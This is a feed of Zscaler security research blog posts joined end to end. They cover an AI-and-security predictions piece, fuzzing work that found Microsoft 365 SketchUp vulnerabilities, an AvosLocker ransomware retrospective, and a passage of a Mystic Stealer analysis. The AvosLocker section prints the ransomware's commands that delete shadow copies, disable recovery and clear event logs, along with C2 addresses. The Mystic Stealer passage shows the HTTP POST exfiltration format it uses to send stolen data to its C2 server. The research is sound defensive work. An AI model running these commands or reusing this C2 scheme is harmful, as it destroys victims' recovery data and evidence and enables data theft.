AI and ML will become a key component of enterprise data protection
As enterprises recognize the need to prevent data loss across their footprint, it is likely that they will increasingly leverage AI as a means of identifying and protecting their data. In conversations with customers about preventing data leakage, one challenge that frequently surfaces is that enterprises often lack visibility into all the places where their critical data lives, and are thus unable to classify and protect it using technologies like DLP. DLP remains an attractive option in the context of generative AI — we have a video here showing how DLP blocks source code from being entered into ChatGPT, for instance. However, lacking a complete understanding of their data, enterprises can find it challenging to create policies that prevent leakage when using these tools.
As a result, we anticipate that enterprises will increasingly leverage AI as a way to gain data visibility and improve their data hygiene. Using ML, for instance, it is now possible to discover and classify sensitive data automatically, such as financial and legal documents, PII and medical data, and much more. From there, enterprises will take the next step and use these ML-driven data categories as the basis of DLP policy — thus preventing data loss when using tools like ChatGPT.
AI will transform how enterprises understand risk and security from the top down
We’ve talked about how enterprises are adopting generative AI tools to transform business. Broadening out, it’s also possible to anticipate the ways AI will become a core business function, specifically from the perspective of risk and security. While enterprises currently leverage AI to unleash new potential and insights across IT, technology, marketing, customer experience, and more, they will increasingly look to AI and ML to transform how they view risk. Here are three key roles that AI will increasingly play for security:
Provide a comprehensive view of risk. In conversations with customers, we hear that enterprises commonly have limited visibility and fragmented or delayed data around enterprise risk. In much the same way that AI can help discover and classify data, we predict enterprises will use AI to visualize and quantify risk across their entire footprint. This includes gaining comprehensive insights and risk scoring across their attack surface and across their business entities —including their workforce, applications, assets, and third parties.
Deliver top-down visualization and reporting. Similarly, enterprises will leverage AI to gain top-down and board-level visualizations of their risk — a critical but rarely-achieved goal. Enterprises will use these insights to uncover and drill down into their top contributing factors to risk, including the ability to quantify the financial impact of exposures.
Drive prioritized remediation. Finally, enterprises will seek AI tools that allow them to automatically gain prioritized security actions and policy recommendations, which are tied to their key risk drivers and which quantifiably improve the security of their organization.
Want to learn more about how enterprises can better embrace AI and solve its risks? Tune in to our webinar, AI vs. AI: Harnessing AI Defenses Against AI-Powered Risks.
Thu, 09 Nov 2023 10:13:40 -0800Will Seatonhttps://www.zscaler.com/blogs/security-research/generative-ai-5-enterprise-predictions-ai-and-security-2023-2024-and-beyondThreatLabz Discovers 117 Vulnerabilities in Microsoft 365 Apps Via the SketchUp 3D Library - Part 1
https://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vulnerabilities-microsoft-365-apps-sketchup-3d
Introduction
Microsoft launched support for SketchUp (SKP) files in June 2022 and in doing so, unknowingly introduced numerous vulnerabilities to Microsoft 365 applications. Within approximately three months, our research efforts unveiled 117 unique vulnerabilities. Microsoft assigned CVE-2023-28285, CVE-2023-29344, and CVE-2023-33146 to catalog these vulnerabilities. Consequently, Microsoft took the precautionary step of temporarily disabling SketchUp support in Microsoft 365 in June 2023. In this blog post, we will share the methodologies used to uncover these vulnerabilities and provide technical details for some of the vulnerabilities. This is Part 1 of our two-part series. The second part will be available soon.
Key Takeaways
The ThreatLabz research team discovered 117 vulnerabilities in Microsoft 365 applications, which were introduced when the SKP file format was added.
Microsoft assigned 3 CVEs to track these vulnerabilities: CVE-2023-28285, CVE-2023-29344, and CVE-2023-33146.
Microsoft created a patch to address the vulnerabilities that ThreatLabz was able to bypass.
Microsoft disabled support for the SketchUp file format in Office as a result.
Background
Towards the end of December 2022, Zero Day Initiative (ZDI) published 4 vulnerability advisories related to Microsoft Office SKP files. Those were the first observed SKP file parsing vulnerabilities in Microsoft Office. This discovery triggered our interest in the specific component responsible for parsing SKP files.
Figure 1: 4 vulnerability advisories about Microsoft Office SKP files from ZDI
Introduction to 3D Models in Microsoft 365
The Office 3D component is a feature within Microsoft 365 apps that facilitates the integration and manipulation of 3D content into various Office applications. This component empowers users to work with 3D models, making it especially valuable for tasks such as creating presentations, visualizing data, or enhancing the overall user experience. The list below represents the 7 supported 3D formats within Microsoft 365 apps.
Binary GL Transmission Format *.glb
Filmbox Format *.fbx
Object Format *.obj
3D Manufacturing Format *.3mf
Polygon Format *.ply
StereoLithography Format *.stl
SketchUp *.skp (New!)
In 2022, the SketchUp file format was introduced as a new 3D file format to Microsoft 365 apps. It's important to note that various other 3D file formats have long-standing support within Microsoft 365 apps. As a general rule, the introduction of a new feature, such as the support of SketchUp files, may introduce security vulnerabilities.
SKP File Format
SKP is a proprietary file format developed by SketchUp Software for 3D modeling and design. An SKP file contains data and information necessary to create and render 3D models, including geometry, textures, materials, and more. The SKP format was originally developed in 2000 by @Last Software. Google acquired the SKP format in 2006, and then Trimble Navigation took ownership in 2012. The popularity of SketchUp has continued to grow and it was recently named the #1 architecture software program in the world (as shown in Figure 2), based on G2’s Grid® Report for Architecture, Spring 2023.
Figure 2: G2’s Grid® Report for Architecture, Spring 2023
In June 2022, Microsoft officially announced the integration of SketchUp file support into their Office applications for both Windows and Mac platforms as shown in Figure 3.
Figure 3: Add SketchUp files to Office creations
SketchUp files are inserted into an Office document by selecting Insert → 3D Models and then choosing a SketchUp file as shown in Figure 4.
Figure 4: Process to insert SKP files into an Office document
Reverse Engineering the Office 3D Component
Reverse engineering plays a critical role in uncovering and understanding software vulnerabilities, as it allows cybersecurity experts to dissect and analyze code — providing valuable insights into how potential weaknesses and security flaws can be exploited or mitigated.
Office 3D Parsing
The dynamic library MSOSPECTRE.DLL (shown in Figure 5) is responsible for parsing 3D file formats in Microsoft 365 apps. Our vulnerability research on the SketchUp file format was conducted in version 16.0.16026.20000, which was released in January 2023.
Figure 5: MSOSPECTRE.DLL is responsible for parsing 3D file formats in Microsoft 365 apps
During our analysis of MSOSPECTRE.DLL using IDA Pro, a series of functions with names prefixed with "SU" caught our attention, as depicted in Figure 6. It's worth noting that these functions are, in fact, SketchUp C APIs sourced from the SketchUp SDK.
Figure 6: A bunch of functions with name prefixed with “SU” in IDA Pro
By combining reverse engineering MSOSPECTRE.DLL with dynamic debugging, we determined the function Spectre::Transcoder::ImporterSKP::ImportToAsset3D is responsible for parsing an SKP file in Microsoft 365 apps. Figure 7 provides a code snippet of its pseudo code.
Figure 7: The function Spectre::Transcoder::ImporterSKP::ImportToAsset3D
This function calls a sequence of SketchUp APIs and certain wrapper functions that, in turn, invoke additional SketchUp APIs, as demonstrated below.
SUInitialize
SUModelCreateFromBufferWithStatus
SUTextureWriterCreate
SUModelGetRenderingOptions
SUModelGetEntities
Spectre::Transcoder::ImporterSKP::CountEntities
Spectre::Transcoder::ImporterSKP::ExportEntities
Now, we’ll examine the implementation for each of these wrapper functions.
1. Spectre::Transcoder::ImporterSKP::CountEntities (Shown in Figure 8)
SUEntitiesGetNumGroups
SUEntitiesGetGroups
Spectre::Transcoder::SkpUtils::IsVisible
Spectre::Transcoder::ImporterSKP::CountEntities
SUEntitiesGetNumInstances
SUEntitiesGetInstances
Spectre::Transcoder::ImporterSKP::CountComponentInstance (Shown in Figure 9)
SUEntitiesGetNumFaces
Spectre::Transcoder::SkpUtils::GetRenderingOptionValue
SUEntitiesGetNumEdges
Figure 8: Spectre::Transcoder::ImporterSKP::CountEntities
Figure 9: Spectre::Transcoder::ImporterSKP::CountComponentInstance
2. Spectre::Transcoder::ImporterSKP::ExportEntities (Shown in Figure 10)
SUEntitiesGetNumGroups
SUEntitiesGetGroups
SUGroupToDrawingElement
Spectre::Transcoder::ImporterSKP::ExportEntities
SUEntitiesGetNumInstances
SUEntitiesGetInstances
Spectre::Transcoder::ImporterSKP::ExportComponentInstance
SUEntitiesGetNumFaces
SUEntitiesGetFaces
Spectre::Transcoder::ImporterSKP::ExportFaces
SUEntitiesGetNumEdges
SUEntitiesGetEdges
SUEdgeGetSoft
SUEdgeGetStartVertex
SUEdgeGetEndVertex
SUVertexGetPosition
Spectre::Transcoder::SkpUtils::ToVector3
Figure 10: Spectre::Transcoder::ImporterSKP::ExportEntities
3. Spectre::Transcoder::ImporterSKP::ExportComponentInstance (Shown in Figure 11)
SUComponentInstanceGetDefinition
SUGroupToDrawingElement
SUComponentDefinitionGetEntities
SUDrawingElementGetMaterial
Spectre::Transcoder::ImporterSKP::ExportEntities
Figure 11: Spectre::Transcoder::ImporterSKP::ExportComponentInstance
4. Spectre::Transcoder::ImporterSKP::ExportFaces (Shown in Figure 12)
Spectre::Transcoder::SkpUtils::GetEffectiveMaterial
Spectre::Transcoder::ImporterSKP::GetMaterial
Spectre::Transcoder::ImporterSKP::AddFacesGeometry
Figure 12: Spectre::Transcoder::ImporterSKP::ExportFaces
5. Spectre::Transcoder::ImporterSKP::GetMaterial (Shown in Figure 13)
SUMaterialGetType
SUMaterialGetUseOpacity
SUTextureGetAverageColor_0
Spectre::Transcoder::SkpUtils::GetMaterialColor
Spectre::Transcoder::SkpUtils::GetTextureId
Spectre::Transcoder::ImporterSKP::GetTexture
SUMaterialGetOpacity
Figure 13: Spectre::Transcoder::ImporterSKP::GetMaterial
6. Spectre::Transcoder::SkpUtils::GetTextureId (Shown in Figure 14)
SUTextureWriterLoadFace
SUGroupToDrawingElement
SUTextureWriterLoadEntity
Figure 14: Spectre::Transcoder::SkpUtils::GetTextureId
7. Spectre::Transcoder::ImporterSKP::GetTexture (Shown in Figure 15)
SUImageRepCreate
SUTextureWriterGetImageRep
SUImageRepConvertTo32BitsPerPixel
SUImageRepGetDataSize
SUImageRepGetPixelDimensions
SUImageRepGetData
SUImageRepRelease
Figure 15: Spectre::Transcoder::ImporterSKP::GetTexture
8. Spectre::Transcoder::ImporterSKP::AddFacesGeometry (Shown in Figure 16)
SUMeshHelperCreate
SUMeshHelperGetNumVertices
SUMeshHelperGetNumTriangles
SUMeshHelperGetVertexIndices
SUMeshHelperGetVertices
SUMeshHelperGetNormals
SUMeshHelperGetBackSTQCoords
SUMeshHelperGetFrontSTQCoords
SUMeshHelperRelease
Figure 16: Spectre::Transcoder::ImporterSKP::AddFacesGeometry
Throughout our reverse engineering process, we successfully analyzed all of the relevant functions involved in parsing SKP files within the Office 3D component. In particular, we discovered Microsoft leveraged a series of SketchUp C APIs to implement the functionality to parse an SKP file.
SketchUp provides an SDK, including a C API. The online C API documentation contains reference material for all functions, data structures, and enumerations in both the SketchUp C API and the SketchUp Importer/Exporter interface. This was helpful to create and refine our SketchUp fuzzing harness.
Numerous SketchUp APIs were used in the fuzzing harness. We will highlight some key functions below.
void SUInitialize (): Initializes the slapi interface. Must be called before calling any other API functions.
void SUTerminate (): Signals termination of the slapi interface. Must be called when done using API functions.
enum SUResult SUModelCreateFromBufferWithStatus(SUModelRef *model, const unsigned char *buffer, size_t buffer_size, enum SUModelLoadStatus *status): Creates a model from a SketchUp skp file buffer.
Figure 17: The function SUModelCreateFromBufferWithStatus
The function SUModelCreateFromBufferWithStatus takes 4 parameters, where the 2nd and 3rd parameters are input parameters, and the 1st and 4th parameters are output parameters.
Creating a harness for fuzzing
Now, we’ll explore how to develop a harness for fuzzing the Office 3D component MSOSPECTRE.DLL. Figure 18 provides an overview of the source code of our SketchUp harness.
Figure 18: An overview of the source code for our SketchUp harness
In this code, we declared various SketchUp APIs and implemented several wrapper functions, which were derived from reverse engineering the Office 3D component.
Figure 19 provides a code snippet for our SketchUp fuzzing harness. In the main function, the first step loads MSOSPECTRE.DLL using the LoadLibrary API, which returns the base address of MSOSPECTRE.DLL in memory. Then the function SUInitialize is called to initialize the SketchUp API functions. Once initialization occurs, the function fuzzme() is called. To ensure proper cleanup, the function SUTerminate is called.
Figure 19: A code snippet of our SketchUp fuzzing harness
The function fuzzme() implements the functionality found in the method Spectre::Transcoder::ImporterSKP::ImportToAsset3D in MSOSPECTRE.DLL as shown in Figure 20.
Figure 20: The function fuzzme() in harness
With our SketchUp harness complete, the next important step is setting up a fuzzer to effectively test it as follows:
1. Gather thousands of samples of SKP files from various websites. For example:
https://3dwarehouse.sketchup.com/my_3d_warehouse
https://www.cgtrader.com/3d-models?free=1&file_types[]=14
https://sketchup.cgtips.org/
2. To make the fuzzing process efficient, narrow down this collection to a smaller group of SKP files using winafl-cmin.py.
Note: While integrating this harness into WinAFL, we encountered a timeout issue. This might have been due to the slightly longer time it takes to parse an SKP file within this harness.
Despite the timeout challenge, we adopted a dumb file format fuzzer, which proved to be a workable solution. Ultimately, this approach led to impressive results, uncovering a total of 20 unique vulnerabilities illustrated in Figure 21 in just one month. These findings include various types of vulnerabilities such as use-after-free, heap buffer overflow, integer overflow, out-of-bounds write, type confusion, stack buffer overflow, etc.
Figure 21: Vulnerabilities discovered by ThreatLabz through SketchUp harness
SKP file format
Through reverse engineering, we also uncovered that SKP files support two distinct data types:
MFC type
VFF type
As shown in Figure 22, the function SketchUpModelReader::ReadModel is used to read data from an SKP file. If a VFF header is present in the SKP file, it calls SketchUpModelReaderVFF::ReadModel to handle VFF type data. Otherwise, it calls SketchUpModelReaderMFC::ReadModel to handle MFC type data.
Figure 22: The function SketchUpModelReader::ReadModel in MSOSPECTRE.DLL
We created a diagram in Figure 23 for the MFC data type structure thanks to our analysis of SketchUpModelReaderMFC::ReadModel. The structure starts with a SketchUp header, then a GUID, followed by a versionMap, and other specific data. Inside the versionMap and data sections, there are often bytes that start with FF FE FF, followed by a length field (1 byte), and then a Unicode string. After the Unicode string, there is specific data.
Figure 23: The SKP file structure of MFC data type
Next, we will explore the structure of an SKP file with the VFF data type. As illustrated in Figure 24, the structure starts with a SketchUp header, followed by a VFF header, and then a ZIP file. The VFF header contains 13 bytes of data, which includes the magic bytes ‘VFF’, followed by a length field indicating the length of the remaining VFF header, and then 4 bytes (currently unknown), and then a 4-byte checksum.
Figure 24: The SKP file structure of the VFF data type
Figure 25 shows a stack backtrace for a crash that indicates that the data type within the SKP file is the MFC type.
Figure 25: The stack backtrace of an SKP PoC file with an MFC type
The crash occurs during the parsing of a JPEG file embedded with the SKP file. What makes this finding particularly interesting is that another third-party library, FreeImage, is used to parse the image file embedded within an SKP file.
When comparing a normal SKP file to the minimized SKP PoC file, only 1 byte is mutated within a JPEG image that’s part of the ‘materials’ structure in the SKP file (as shown in Figure 26).
Figure 26: Comparison between a normal SKP file and the minimized SKP PoC file
As shown in Figure 27, the function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory parses the image file embedded within an SKP file. Figure 27 illustrates its pseudo code that calls a series of FreeImage APIs.
Figure 27: The function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory
FreeImage is an open-source library designed for developers who want to provide support for various popular graphic image formats including PNG, BMP, JPEG, TIFF, WEBP, and more. FreeImage has the capability to handle 30 different types of image file formats, as illustrated in Figure 28. Interestingly, the last update to this library was made available in 2018. The extensive range of supported formats presents a significant attack surface for potential fuzzing efforts.
Figure 28: FreeImage supports 30 image file formats
We developed a harness named freeimage_harness.exe designed for fuzzing FreeImage by implementing the functionality of the function MSOSPECTRE!FreeImageUtils::CreateBmpFromMemory in MSOSPECTRE.DLL.
Once we had the FreeImage harness ready, setting up a fuzzer was a straightforward task. We then took the following steps:
Gather thousands of samples for the 30 different image file formats supported by the library.
Minimize the collected samples for each image format using winafl-cmin.py.
Seamlessly integrate the FreeImage harness into WinAFL.
The result was very successful, discovering 97 unique vulnerabilities in just two months.
Next, we will take a look at the process of reproducing these vulnerabilities within Microsoft 365 apps through a SketchUp file. We created a SketchUp template file based on the MFC data type as shown in Figure 29.
Figure 29: A SketchUp template file with the MFC data type
The following steps were performed:
Obtain the size of the crafted image file (PoC file for FreeImage).
Replace the image data in the SKP template file with the specially crafted image file.
Revise the size field (4 bytes), which is situated just before the image data.
Mitigation
All users of Microsoft 365 Apps are encouraged to upgrade to the latest version of this software. Zscaler’s Advanced Threat Protection and Advanced Cloud Sandbox can protect customers against these vulnerabilities.
Win64.Exploit.CVE-2023-28285
Win64.Exploit.CVE-2023-29344
Win64.Exploit.CVE-2023-33146
To Be Continued
In our journey through Part 1 of this series, we’ve explored how ThreatLabz reverse engineered 3D Models in Microsoft 365 and the SKP file format. In Part 2, we’ll dive deeper into the vulnerabilities that we discovered and examine real-world case studies.
Tue, 31 Oct 2023 20:18:30 -0700Kai Luhttps://www.zscaler.com/blogs/security-research/threatlabz-discovers-117-vulnerabilities-microsoft-365-apps-sketchup-3dA Retrospective on AvosLocker
https://www.zscaler.com/blogs/security-research/retrospective-avoslocker
Introduction
On October 11, 2023, the Cybersecurity and Infrastructure Security Agency (CISA) published an advisory for AvosLocker, which was a sophisticated double extortion Ransomware-as-a-Service (RaaS) group that was last observed being active in May 2023. Our research team put this report together so the security community can learn how to counteract other threats that employ similar tactics and procedures (TTPs).
The AvosLocker group gained prominence in July 2021 and was known for employing a double extortion strategy where they first stole data before encrypting it. The group would then threaten to release the data on a dedicated leak site unless a ransom was paid. Initially, AvosLocker primarily targeted Windows systems, but they subsequently expanded their reach by creating a Linux version of their ransomware designed to target VMware ESXi.
Key Takeaways
AvosLocker was a Ransomware-as-a-Service double extortion group.
No new activity has been observed since May 2023.
AvosLocker hosted a data leak site from July 2021 to July 2023, where they would add stolen proprietary data unless a ransom was paid.
AvosLocker heavily targeted the education sector – accounting for 25% of their attacks.
The United States bore the brunt of most AvosLocker attacks accounting for a whopping 72.2%, with Canada trailing far behind at 9.3%.
Attack Methodologies
Since different affiliates employed distinct intrusion techniques, each threat actor’s deploying AvosLocker approach to gain unauthorized access varied significantly. Affiliates were observed exploiting ProxyShell vulnerabilities, like CVE-2021-34473, CVE-2021-34523, and CVE-2021-31207, present in the Microsoft Exchange server to obtain initial access. AvosLocker affiliates also infiltrated victims' networks via compromised RDP and VPN accounts, and exploited the Zoho ManageEngine ServiceDesk Plus vulnerability.
After infiltrating a victim’s network, the ransomware was executed in Windows Safe Mode to maximize the number of files that could be encrypted, since applications such as databases and security software (e.g., antivirus programs) would likely not be running. This technique ensured that these applications would not interfere with file encryption. The ability to encrypt files in Windows Safe Mode is a feature that has been observed in other ransomware families, including Conti, REvil, and BlackMatter.
Infections by Industry
Figure 1, shown below, depicts the industries most affected by AvosLocker as a percentage of total attacks over the past year.
AvosLocker focused its attacks on the education sector and received approximately 25% of the group’s total attacks.
Furthermore, AvosLocker impacted the manufacturing and healthcare industry, which accounted for approximately 15.38% and 9.62%, respectively.
Figure 1: Industry verticals targeted by double extortion attacks using AvosLocker
Countries Targeted by AvosLocker
The U.S. emerged as the hardest-hit country in attacks orchestrated by the AvosLocker group, with more than 72% of attacks as shown in Figure 2. This highlights the scale and severity of the cyberthreat faced by U.S. businesses and institutions. Canadian organizations received 9.3% of AvosLocker’s attacks. China and Taiwan shared a similar level of impact, each experiencing 3.7% of AvosLocker attacks.
Figure 2: Breakdown of victims by country breached by AvosLocker
Ransomware Analysis
Since first discovered in 2021, AvosLocker binaries have undergone slight changes and improvements. The following is a detailed analysis of the last variant used in-the-wild.
Command line arguments
AvosLocker implements multiple command line arguments, as shown in Figure 3, allowing for customization of the ransomware execution based on affiliate requirements.
Figure 3: AvosLocker command line arguments
The threat actor decides what functionality to enable/disable during the execution of the AvosLocker ransomware. When executed, the selected options are displayed in the console as shown below.
Build: SonicBoom
b_bruteforce_smb_enable: 0
b_logical_disable: 0
b_network_disable: 1
b_mutex_disable: 0
concurrent_threads_num_max: 200
AvosLocker creates the mutex Zheic0WaWie6zeiy by default to ensure that only one ransomware process is running at a given time, unless the --nomutex command line argument is provided.
Pre-encryption measures
Upon execution, AvosLocker first checks whether it has administrative privileges, and if not, it shows the debug message in the console, The token does not have the specified privilege, and then executes a process termination routine targeting databases, web browsers, and other business applications. The list of processes to be terminated were decoded dynamically using a stack-based string obfuscation algorithm (described later in the report). The process names in Table 1 were terminated.
Table 1: AvosLocker process termination list
encsvc
thebat
mydesktopqos
xfssvccon
firefox
infopath
winword
steam
synctime
notepad
ocomm
onenote
mspub
thunderbird
agntsvc
mydesktopservice
excel
powerpnt
outlook
wordpad
dbeng50
isqlplussvc
sqbcoreservice
oracle
ocautoupds
dbsnmp
msaccess
tbirdconfig
ocssd
sql & visio
Then, AvosLocker performs the following actions:
Deletes Windows shadow copies to prevent the recovery of files using the following commands:
wmic shadowcopy delete /nointeractive
vssadmin.exe Delete Shadows /All /Quiet
Disables recovery mode and the edits the boot status policy, which prevents access to Windows Recovery Mode with the following commands:
bcdedit /set {default} recoveryenabled No
bcdedit /set {default} bootstatuspolicy ignoreallfailures
Deletes the Windows event logs to cover up evidence of malicious activity with the following PowerShell command:
Powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"
Encryption process
AvosLocker leverages multiple threads to encrypt the target files on an infected machine. Then it enumerates all drives (e.g., fixed, removable, and network shares) based on the command line arguments. The ransomware then performs a file extension check where the files with the extensions in Table 2 are excluded and not encrypted.
Table 2: AvosLocker extension exclusion list
avos
avoslinux
avos2
avos2j
themepack
nls
diagpkg
msi
lnk
exe
cab
scr
bat
drv
rtp
msp
prf
msc
ico
key
ocx
diagcab
diagcfg
pdb
wpx
theme
mpa
hlp
icns
rom
dll
msstyles
mod
ps1
nomedia
spl
ics
hta
bin
cmd
ani
386
lock
cpl
adv
cur
idx
sys
com
deskthemepack
shs
ldf
icl
msu
In addition, AvosLocker won’t encrypt any files listed in Table 3.
Table 3: Files excluded by AvosLocker
Thumbs.db
ntuser.ini
ntuser.dat.log
ntuser.dat
ntldr
iconcache.db
desktop.ini
config.msi
bootsect.bak
bootfont.bin
boot.ini
autorun.inf
Furthermore, AvosLocker won’t encrypt the directories in Table 4.
Table 4: Folders excluded by AvosLocker
All Users
AppData
boot
bootmgr
Games
Intel
Microsoft.
Program Files/Program Files (x86)
ProgramData
Public
Sophos
System Volume Information
Windows
Windows.old
WinNT
MicrosoftSQL Server
AvosLocker encrypts file content using AES in CBC mode with a randomly generated AES key. The AES symmetric key is then encrypted with a 2,048-bit RSA public key embedded in the ransomware binary. Finally, the RSA data containing the encrypted AES key is Base64 encoded and appended to the end of the encrypted file (see Figure 4). Then, the file extension is changed to .avos2.
Figure 4: AvosLocker encrypted file contents
During the encryption phase, the ransomware also prints debug messages to the console that show encryption statistics to the threat actor as shown below.
drive D: took 0.003000 seconds
drive Z: took 0.119000 seconds
drive A: took 1.060000 seconds
drive C: took 19.672000 seconds
Waiting for encryption threads to finish ... [OK]
Encryption Stats
[+] Locked objects: 6313
asym time: clocks 14465
total time: clocks 20648 | 20.648000 seconds
After encryption, AvosLocker drops a ransom note named GET_YOUR_FILES_BACK.txt as shown in Figure 5.
Figure 5: AvosLocker ransom note
AvosLocker also changes the Windows desktop wallpaper (shown in Figure 6) to a message similar to the ransom note text file.
Figure 6: AvosLocker ransom note wallpaper
The victim ID mentioned in the ransom note is hardcoded in the AvosLocker binary and the ransom note’s filename is README_FOR_RESTORE. ThreatLabz also observed AvosLocker using different file extensions such as .avos, .avos2, and .avoslinux, with the latter being used for the Linux variant. The Linux variant is very similar to the Windows version, but also possesses the capability to terminate and encrypt ESXi virtual machines.
Data Leak Site
If a victim decided not to pay a ransom, the group would post stolen data to their data leak site hosted via a Tor hidden service. This tactic was designed to pressure victims to pay a ransom to avoid a loss of sensitive information that may be damaging to the victim organization when publicly disclosed. The AvosLocker data leak site has been down since July 2023 and the payment site went down in August 2023. ThreatLabz observed a total of 60 victims’ data posted on the data leak site as shown in Figure 7.
Figure 7: AvosLocker data leak site
Anti-Analysis
All the important strings in AvosLocker ransomware samples are obfuscated using ADVObfuscator,which pushes encoded versions of strings to the stack, and then decodes them at runtime (as shown in Figure 8), using simple but different algorithms and keys.
Figure 8: AvosLocker string obfuscation
For instance, the string above decodes to: cmd /c wmic shadowcopy delete /nointeractive
NetMonitor Backdoor
AvosLocker leverages NetMonitor, a tool that appears like a legitimate network monitoring utility, but in reality acts as a backdoor for AvosLocker.
NetMonitor establishes persistence after being installed as a system service, using names such as: NetAppTcp, NetAppTcpSvc, WazuhWinSrv, RSM, WinSSP, WebService, etc. Once initiated, NetMonitor tries to contact its C2 server every 5 seconds using a hardcoded IP address and port (usually 443). The malware uses raw sockets and a small binary protocol for all communication, where the encrypted ping packet contains content similar to that shown in Figure 9.
Figure 9: NetMonitor encrypted communication
The first four bytes are random, and the remaining bytes are an RC4 encrypted payload with an 8 byte key. Figure 10 shows the actual payload content after the decryption.
Figure 10: NetMonitor decrypted communication
The first four bytes are also random (and identical to the previous four bytes prepended to the encrypted payload) followed by a command. Depending on the command received, NetMonitor then starts listening on a port or acts as a reverse proxy server.
NetMonitor was closely tied to AvosLocker, with the last observed activity occurring in the first half of 2023, and no new samples have been identified since August 2023.
Conclusion
AvosLocker is a ransomware group that was active and performing double extortion attacks until May 2023. The group also targeted multiple operating systems with different ransomware variants. Zscaler ThreatLabz continues to track different ransomware groups and add indicators of compromise to protect our customers. Please read Zscaler’s yearly ransomware report to learn more about the various trends and most significant ransomware groups.
Zscaler Coverage
Cloud Sandbox
In addition to sandbox detections, Zscaler’s multilayered cloud security platform detects indicators related to AvosLocker at various levels with the threat names listed below.
Win32.Ransom.Avos
Indicators of Compromise (IOCs)
AvosLocker
Hashes
1076a979c6a7633ee3a4884d738452c5
1330887fe501036aff6ed443340e9405
d285f1366d0d4fdae0b558db690497ea
76e177a94834b3f7c63257bc8011f60f
b27f0f2826bacd329fb28d9cda002d7d
16a5d134d50eeb34989b48dca166462d
f9de6998546e9ea169c54527962e1e92
1933f61951738b6fdbfff3fa0f65d712
63e12fa6203dc61fc82343e7dec1b33b
4e75f8dc15a82674c57c4f12dbd78808
8c4bfd216fb8e69f7f1e1f4cb1e3f9a1
0e9432cd9e9405b04f4e46b368585d60
19944159dfa94a1b75effd85e6b906dc
869fc579f45a790b7c485d52cb2c8986
0b3888d8683d3ebb27627452a0179575
194c16941dc618facef7d0c4749a39a7
c41c5de8abeb92adaf8a86cf8b31570e
f091b9085d35e61945c743e3683b1b71
2d7cf26f4e4dacf637f7ef0b1edfbda5
a0a60441609f42f2f79c7826db9ae296
URLs
Payment Sites:
avosjon4pfh3y7ew3jdwz6ofw7lljcxlbk7hcxxmnxlh5kvf2akcqjad.onion
avos2fuj6olp6x36.onion
Data Leak Sites:
avosqxh72b5ia23dl5fgwcpndkctuzqvh2iefk5imp3pi5gfhel5klad.onion
avos53nnmi4u6amh.onion
NetMonitor
Hashes
A5485e8f09f6428b42b499bc914532e6
e5dac186720ea10f3752aa30a96d3fc0
9ff900a05d75b97948a3b52d8835b21f
15e948c18ea77efb5ffbf0a72d05d348
85e44d1333422e9b550c94ad7b7202a0
d59dca267722dfd923350d5b139b1036
C&Cs
194.213.18.138:443
146.70.147.17:443
142.44.132.90:443
45.66.249.80:443
23.227.198.197:443
23.236.181.117:443
Fri, 27 Oct 2023 08:17:50 -0700Niraj Shivtarkarhttps://www.zscaler.com/blogs/security-research/retrospective-avoslockerMystic Stealer Revisited
https://www.zscaler.com/blogs/security-research/mystic-stealer-revisited
Introduction
Mystic Stealer is a relatively new downloader and information stealer that emerged in early 2023. The malware harvests data from a large number of web browsers and cryptocurrency wallet applications. Mystic can also be used to steal Steam game credentials and arbitrary files from an infected system. Mystic stands out for the level of obfuscation and improvements with each new version of the malware. The code continues to evolve and expand the data theft capabilities and the network communication was updated from a custom binary TCP-based protocol to an HTTP-based protocol. The shift to HTTP may be due to Mystic Stealer failing to beacon back to a C2 server in corporate environments, which frequently block network traffic on non-standard ports. The new modifications have led to increased popularity with criminal threat actors leveraging its loader functionality to distribute additional malware families including RedLine, DarkGate, and GCleaner.
In this blog, we will analyze the latest updates to Mystic Stealer as a follow-up to our previous report.
Key Takeaways
Mystic Stealer is an information stealer that was first advertised in April 2023, which targets nearly 40 web browsers and more than 70 browser extensions.
Mystic Stealer has been regularly updated with improvements to its code obfuscation, configuration, and methods of communication.
The malware’s command and control (C2) communications have been updated from a custom encrypted binary protocol to HTTP.
Mystic Stealer has added loader functionality in recent versions to complement its information stealing abilities.
Mystic Stealer has been used by numerous threat groups that leverage it to distribute second-stage malware payloads including RedLine, DarkGate, and GCleaner.
Technical Analysis
The latest variant of Mystic Stealer has introduced some notable changes in both the behavior of the malware and in the obfuscation. The entry point of the malware is very similar to the older variant. The malware exits if the current date is older than a specific hardcoded date. Figure 1 shows a comparison of the main function between the previous variant and the current variant.
Figure 1: Comparison of the WinMain function for the current and previous Mystic variants
In the latest variant of Mystic Stealer, the decryption of the malware C2s has been moved to a sub-function that is executed after the expiration date (probably to avoid leaking the C2s in memory if this time check fails).
Embedded C2 Configuration
The algorithm used to decrypt the list of C2 is the same custom XTEA-based algorithm as the previous variant. However, after the custom XTEA layer has been decrypted, there is a sequence of HTTP C2s, separated by a “|” delimiter. The C2 path is stored among the list of obfuscated strings that are constructed and decoded using the stack as shown in Figure 2.
Figure 2. Mystic Stealer C2 path obfuscation
Information Stealing Configuration
In the previous Mystic Stealer variant, the target lists for web browsers, extensions (and their IDs), and cryptocurrency applications were embedded and obfuscated in the malware. In recent versions, the application target list is now downloaded from the C2 server instead of being hardcoded, as we will examine in the following section.
Communications
In the latest Mystic Stealer variant, all communications between the infected system and the C2 server are performed using HTTP POST requests. Unlike the previous variant that used RC4 to encrypt a custom binary TCP-based protocol, the latest variant does not implement any form of encryption. The data sent in the POST query is Base64 encoded, as shown below:
POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=<boundary>
Content-Length: NNN
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: X.X.X.X
Connection: Keep-Alive
Cache-Control: no-cache
--<boundary>
Content-Disposition: form-data; name="<name>"
BASE64(<data>)
--<boundary>
The response data from the server is also encoded in Base64. The response starts with “OK\r\n” and is followed by any data returned by the C2 server for the specific query.
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 11 Sep 2023 HH:MM:SS GMT
Content-Type: text/html; charset=utf-8
Content-Length: NNN
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
BASE64(OK <rest of data for the specific command, if necessary>)
Registration
